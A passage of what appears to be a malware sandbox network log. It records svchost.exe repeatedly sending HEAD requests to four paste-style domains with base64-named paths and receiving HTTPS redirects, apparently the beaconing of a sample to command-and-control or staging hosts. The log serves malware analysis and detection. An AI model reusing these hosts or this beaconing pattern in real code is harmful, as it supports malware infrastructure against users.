                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZVNE8vpAsm4%2FQLxwwJRjreU51qfTLD%2F0XkikoSkuhTWoHqbZYtSJBpoQt8s189NglTyHLIFdKpwnWeMsQcc3mnMHc2TVgUfJBrvXatYcEsBD3srh15msKGdPQ9s0LuEAA%2Fqg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cc48907c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.750096172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:59.699696064 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.189785004 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Du2Q%2FFVh7XrNmTntxhe7LEgqL5dXAaI1V1jHKpyO0lRNab9Ca2U%2BFIVs6akBLe35bSJbGOvofC1OXiC13GXecOUObcCq8rokNUf%2FyBtA0FTeIlz3rCB0urd%2BPypiXJZU"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cddcd443b6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1922&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.750106172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:00.195873022 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.669436932 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Za0HjlXFAlYaLiqwlGyHuXr4R3xJfAu8CINdvlvCll8eOzYmY1%2FpafB789Urpa77jaCDkYeIYbH4P0Ad0bAiFWiu%2FSEs3uU9hQetMU6d8yUi4UrryaJP65xoVIAhCLT%2BYS%2F%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d0db9942ca-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.750108188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:00.432697058 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.891446114 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGD%2BXrjzHSGaH3Eg82rrbOIJtIRf%2FpAYe83yDwfXFmvIiCfm9sELzLiPZxS8shPhGmqg7lgRpCnoouXipZKHOwz0MC1dj6ipRw1Wgi5tWBIAdvQq83noa7YcYmyqXGsY794%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d23e039e08-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.750110104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:00.675987005 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.126154900 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r79r4g%2BiEGz5CrMCfrc6aSRYDNft4U6DTIrfI8CG3qbUXIOTsm6dswIVFOJ7cwFOk04NGcn7AK90WA1wN79cAfjS6IHzM%2Fk72IftT%2FIMtWPUlwdqK0loMQFAcyianYBzmlsL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d3b9f3c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1652&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.750115172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:00.897468090 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.370486975 CET856INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l1tLPlc6NBMAzK3Wfa%2BTiT3xHmgaZ7b54ZmKIVznimknLJOoTewsTJ0dXrFzlYQjgPbTavsbQBxjgZZANs0MI15S6vGe088i86xSK869yfafuCc0V69Ejnc3Q7KSxZyP"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d538afc470-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              58192.168.2.750122172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:01.377096891 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.833303928 CET865INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2718FK5K4CHUQq1BSCdzlI62Z4SY7TOY5ZQE5UCiz2nsbbW2NApMUfGgvWSwC1Nlm8UwqwJecCA4HZZOCUtabAXiNgGN0AfQFc00w8RwSzfdRAoR53RCcRjWglyzupRtqOJm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d81ae84235-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1724&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.750124188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:01.594049931 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.078713894 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BoUSnaJkEj7wJBP0By0QVAuqX%2F8wxXSF%2FH15C%2B67IvHz6L2toWaQljzIydXVwg6%2FVv4Tdck8AIsFE4rJk7fc9TxwqvkEQijlYEeVg6Uz3sOOg6Td9W8RZRYOJtOGMwLTWk%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d9a9d2423f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2176&rtt_var=1088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.750131104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:01.839325905 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.288213968 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgZSgeth8TQ1EbdynwQzpGfdEnov6Gl213d0YbN94Uy7HP3SQBVzaXOHnnp5E8LS1YukH2q9yMdDlzPgZx84Ax5xobNnOT16ZUd9bTAlBoiomhTa4%2ByEUvUG4HN0Y%2F3k7lBV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3dafc7ec358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.750133172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:02.085355043 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.536221027 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VslYA1%2FLvVTCPJDkgWYjfDgyoGhjy5gNklnLtwjAx0UEU2kAZFG0Xq%2F0BMLWfFCN6lYQF0yE6WGDTXY0cXsa3%2F53e5D3LkBT7tFGTV0swXWAQNsYqdpbNROIwjZAsqUK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3dc8f260f95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.750143172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:02.543524027 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.022188902 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L47AroqyZPTRUxFFWP2uLoqluqjklKQNlLBsXytthjF1h58i6bhcSUmkw7W0JLKo%2F2OJokpCOKrW59jIRM96Cjll0CwlRer0DhT64r0q%2B0AScwX9kYJ73SCCyG%2BxjywpTvpp"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3df8eaff5fa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1507&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.750145188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:02.772903919 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.248403072 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2zF0cJqpFLz9%2Fl0cxNavUpsHu5ou4GgbcnFujCA%2B8TyR7BpYA%2BOKD6Bx%2FJjyj17jbcHaOm7b9hEZygktWrzQlGkzgaTOvIKPfQq7WaAgkMa2emaRwFYkUNau3HfQiofQ0k%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e0f8924363-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.750147104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:03.028840065 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.481189013 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EANa1jrdokpHJu%2Bd5ajGA1aJjctZL7ZU3L83Ulw2p5LBHRUyQV29ww3rbZjnOwBvpIGfvgH26JgHSWEEohYampXk8wNGIeP%2BrMYMEpS3ehRrw9uPtc%2FFeS0EEpTtBTdXseiR"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e279568ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1935&min_rtt=1935&rtt_var=967&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.750154172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:03.254801989 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.714948893 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1i8gYJ9%2BvltQ9VJyn1lP8pvKJI6Tce2IzDx%2BOAmV65jk%2FJ4PQYobAzl5r8V0ujyzxJNJ%2FuLGeIfrJ5JhA9ZVy04p0bQytufnGrFuDcMVQOPsRhjY0zjjhXUuSO1cSYVF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e3d82b5e86-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.750159172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:03.721498966 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.195158958 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAjrcAVe4a2CXvhl8ZPl%2FNaD8jnL6Tq0NBWQBdazHg%2FWyW99%2FzKCfbAXlypi9SPW8X5P2TLcVrEuacHuK2xWSo1yc%2FLiLx%2F4%2Bju5dM9DtKTtm3GW1uMQEhA6F%2FRWBU6JEL3l"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e6df494273-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=2515&rtt_var=1257&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.750165188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:03.970514059 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.430886984 CET869INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YstU1iy6TSPkVAuwtbBhWwydddzFgUQpGX9pPGo3wcnYgN1kECTYGgKVLdhjEGUthEY5HEKVvfAho2Iy1VR3qPTPr6wQhV5ieCNkfD4ierGZP103KnolT50z%2F5EyOyNel9U%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e85a0eefa9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.750168104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:04.201380968 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.714772940 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2FvSQhXZOKIyjwY3nxh%2Fpf%2FAhwGPv4dkA3bV5P345DdXiNwXngc9yuHGwLmrKWBwvDyhF%2BBLuucgeHK6lSxPLXKa0bha1lYLCAjaG4JYgg628eSo38gGSEh3of0tr9u4Cb9e"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ea2d548ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1930&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.750170172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:04.437614918 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.922410011 CET858INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwdmlYj7Onrjr8Fj29Whpod0DZQuYeZ9vKEJcCR0W9DkaPrMJjHsk7XZ9O6jh4gK8%2FcK7xynqyeO7VCzMnxHhkr3AOOZXb%2B9EfVJcVNAYXIeR0Fh6qXj7nAtnEW6Qibx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3eb6b0a7cac-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.750180172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:04.928903103 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.382282019 CET881INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
